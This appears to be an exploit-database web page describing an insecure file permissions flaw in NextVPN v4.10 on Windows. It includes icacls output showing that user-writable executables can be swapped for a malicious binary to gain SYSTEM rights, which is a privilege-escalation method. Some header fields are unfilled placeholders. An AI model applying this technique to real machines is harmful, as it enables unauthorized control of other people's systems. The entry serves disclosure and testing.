Advertisement






NextVPN v4.10 - Insecure File Permissions Privilege Escalation

CVE Category Price Severity
CVE-XXXX-XXXX CWE-XXX $XXXX High/Medium/Low
Author Risk Exploitation Type Date
Author Name Critical/High/Medium/Low Local/Remote 2020-01-06
CVSS EPSS EPSSP
CVSS:4.0/AV:L/AC:L/AT:P/PR:L/UI:N/S:C/C:H/I:H/A:H 0.02192 0.50148

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2020010039

Below is a copy:

NextVPN v4.10 - Insecure File Permissions Privilege Escalation
# Exploit Title: NextVPN v4.10 - Insecure File Permissions Privilege Escalation
# Date: 2019-12-23
# Exploit Author: SajjadBnz
# Contact: [email protected]
# Vendor Homepage: https://vm3max.site
# Software Link: http://dl.spacevm.com/NextVPNSetup-v4.10.exe
# Version: 4.10
# Tested on: Win10 Professional x64
====================================

[ Description ]
===============

The NextVPN Application was installed with insecure file
permissions. It was found that all folder and file permissions were
incorrectly configured during installation. It was possible to replace the
service binary.


[ PoC ] 
========

C:\Users\Sajjad Hastam\AppData\Local\NextVPN>icacls *.exe

Helper64.exe NT AUTHORITY\SYSTEM:(F)
             BUILTIN\Administrators:(F)
             DESKTOP-5V14SL6\Sajjad Hastam:(F)

NextVPN.exe NT AUTHORITY\SYSTEM:(F)
            BUILTIN\Administrators:(F)
            DESKTOP-5V14SL6\Sajjad Hastam:(F)

Proxifier.exe NT AUTHORITY\SYSTEM:(F)
              BUILTIN\Administrators:(F)
              DESKTOP-5V14SL6\Sajjad Hastam:(F)

ProxyChecker.exe NT AUTHORITY\SYSTEM:(F)
                 BUILTIN\Administrators:(F)
                 DESKTOP-5V14SL6\Sajjad Hastam:(F)

Uninstall.exe NT AUTHORITY\SYSTEM:(F)
              BUILTIN\Administrators:(F)
              DESKTOP-5V14SL6\Sajjad Hastam:(F)

Successfully processed 5 files; Failed processing 0 files

and other Directories : 

>cd openconnect

openconnect.exe NT AUTHORITY\SYSTEM:(F)
                BUILTIN\Administrators:(F)
                DESKTOP-5V14SL6\Sajjad Hastam:(F)
Successfully processed 1 files; Failed processing 0 files


>cd st

st.exe NT AUTHORITY\SYSTEM:(F)
       BUILTIN\Administrators:(F)
       DESKTOP-5V14SL6\Sajjad Hastam:(F)
Successfully processed 1 files; Failed processing 0 files

>cd update

update.exe NT AUTHORITY\SYSTEM:(F)
           BUILTIN\Administrators:(F)
           DESKTOP-5V14SL6\Sajjad Hastam:(F)
Successfully processed 1 files; Failed processing 0 files


[ Exploit - Privilege Escalation ]

Replace NextVPN.exe,update.exe,st.exe,openconnect.exe,Helper64.exe and other ... with any executable malicious file you want then wait and get SYSTEM or Administrator rights (Privilege Escalation)

Copyright ©2024 Exploitalert.

This information is provided for TESTING and LEGAL RESEARCH purposes only.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum